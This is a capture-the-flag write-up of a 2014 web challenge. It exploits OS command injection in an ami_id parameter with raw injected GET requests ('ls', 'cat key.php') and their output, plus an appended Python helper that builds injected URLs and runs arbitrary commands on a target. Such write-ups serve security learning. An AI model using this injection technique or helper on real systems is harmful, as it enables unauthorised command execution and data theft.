In this short write-up I explain how I solved the “CTF247” web challenge from Ghost in the Shellcode (GitS) 2014.

After reviewing the source of the site's index page, the only section that looked interesting and a likely place for the key to be stored was TheFortress, so I analysed that part in detail.

The following GET request corresponds to the Create Server action of the form.

GET /ec2.php?utf8=%E2%9C%93&ami_id=ami-4be3d522&virtual_machine%5Bhost%5D=OGT&virtual_machine%5Bimage_id%5D=0&commit=Create+Server HTTP/1.1
Host: ctf247.2014.ghostintheshellcode.com

Testing every parameter for web application vulnerabilities (this is a CTF web challenge, after all), I found that the ami_id parameter was vulnerable to OS command injection: appending a ";" followed by another command to its value gets that command executed on the server as well.

Below you can see how I inject the command "ls ." into the vulnerable parameter and how the server returns the listing of the files and directories in the current directory.

GET /ec2.php?utf8=%E2%9C%93&ami_id=ami-4be3d522;ls%20.&virtual_machine[host]=OGT&virtual_machine[image_id]=0&commit=Create+Server HTTP/1.1
Host: ctf247.2014.ghostintheshellcode.com
...
.:
total 32
drwxr-xr-x 4 0  4096 Jan 18 21:16 ec2-api-tools-1.6.12.0
-rw-r--r-- 1 0  2488 Jan 18 21:16 ec2.php
-rw-r--r-- 1 0 15675 Jan 18 21:16 index.html
drwxr-xr-x 3 0  4096 Jan 18 21:16 index_files
-rw-r--r-- 1 0    85 Jan 18 21:16 key.php
<!DOCTYPE html>
<html>
...

Since the purpose of this challenge is to obtain the key, let's try to read the file key.php by injecting the command "cat key.php;".

GET /ec2.php?utf8=%E2%9C%93&ami_id=ami-4be3d522;cat%20key.php;&virtual_machine[host]=OGT&virtual_machine[image_id]=0&commit=Create+Server HTTP/1.1
Host: ctf247.2014.ghostintheshellcode.com

In this case the rendered page doesn't show the result of the command injection, because the contents of key.php are PHP code and the browser treats the `<?php ... ?>` block as markup rather than text. The result is still there: `cat` writes the raw bytes of the file to stdout, the PHP interpreter never processes them, and they appear in the page source before the HTML.

...
<?php
	/* flag{0aea26e968895efa40b563e3e8fe8f19} */
	echo('There is a key here.');
?>
<!DOCTYPE html>
<html>
...
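To make the two injection steps above reproducible, here is a small Python helper. It is an example added to this write-up, not the author's tooling: it builds the ec2.php request the same way the GET lines above do (the extra command appended to ami_id after a ";"), strips the command output off the front of the response, and pulls out the flag. The target URL is taken from the write-up; the `fetch` callable, the function names and the SAMPLE_RESPONSE are my own, with SAMPLE_RESPONSE being a constructed reply shaped like the one shown above so that the parsing can be run offline.

```python
"""Helper for the ec2.php command-injection step described above.

Added example, not part of the original write-up. It assumes the target
behaves as the page shows: whatever the injected command writes to stdout
is prepended to the normal HTML response, before the <!DOCTYPE html> line.
"""
import re
import urllib.parse
import urllib.request
from typing import Callable, Optional

TARGET = "http://ctf247.2014.ghostintheshellcode.com/ec2.php"  # host from the write-up
BASE_AMI = "ami-4be3d522"  # the legitimate value the form sends


def build_url(cmd: str, base: str = TARGET) -> str:
    """Return the GET URL with `cmd` appended to ami_id after a ';' separator.

    urlencode percent-encodes the ';', the spaces and the brackets in the
    parameter names, matching the encoded request shown in the write-up.
    """
    params = {
        "utf8": "\u2713",
        "ami_id": f"{BASE_AMI};{cmd};",
        "virtual_machine[host]": "OGT",
        "virtual_machine[image_id]": "0",
        "commit": "Create Server",
    }
    return base + "?" + urllib.parse.urlencode(params)


def extract_output(body: str) -> str:
    """Return the injected command's output, i.e. everything before the page's own HTML."""
    marker = "<!DOCTYPE html>"
    idx = body.find(marker)
    return body if idx < 0 else body[:idx]


FLAG_RE = re.compile(r"flag\{([0-9a-f]{32})\}")


def find_flag(text: str) -> Optional[str]:
    """Return the 32-hex-digit flag body if a flag{...} marker is present."""
    m = FLAG_RE.search(text)
    return m.group(1) if m else None


def http_get(url: str) -> str:
    """Plain HTTP GET; only used when no offline `fetch` is supplied."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def run(cmd: str, fetch: Callable[[str], str] = http_get) -> str:
    """Inject `cmd` via ami_id and return its stdout as captured from the response."""
    return extract_output(fetch(build_url(cmd)))


# Constructed sample reply (my own), shaped like the cat key.php response above.
SAMPLE_RESPONSE = (
    "<?php\n"
    "\t/* flag{0aea26e968895efa40b563e3e8fe8f19} */\n"
    "\techo('There is a key here.');\n"
    "?>\n"
    "<!DOCTYPE html>\n<html>\n<body>Server created</body>\n</html>\n"
)

if __name__ == "__main__":
    # Offline run against the constructed sample; drop `fetch=` to hit a live target.
    out = run("cat key.php", fetch=lambda url: SAMPLE_RESPONSE)
    print(out)
    print("flag:", find_flag(out))
```

Because the challenge host is long gone, `run()` takes a `fetch` callable so the same code can be pointed at a local replica or at the embedded sample; the only target-specific knowledge is the ";" separator and the fact that command output lands before the HTML.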

Finally, as can be seen in the response above, the flag for this challenge was 0aea26e968895efa40b563e3e8fe8f19.
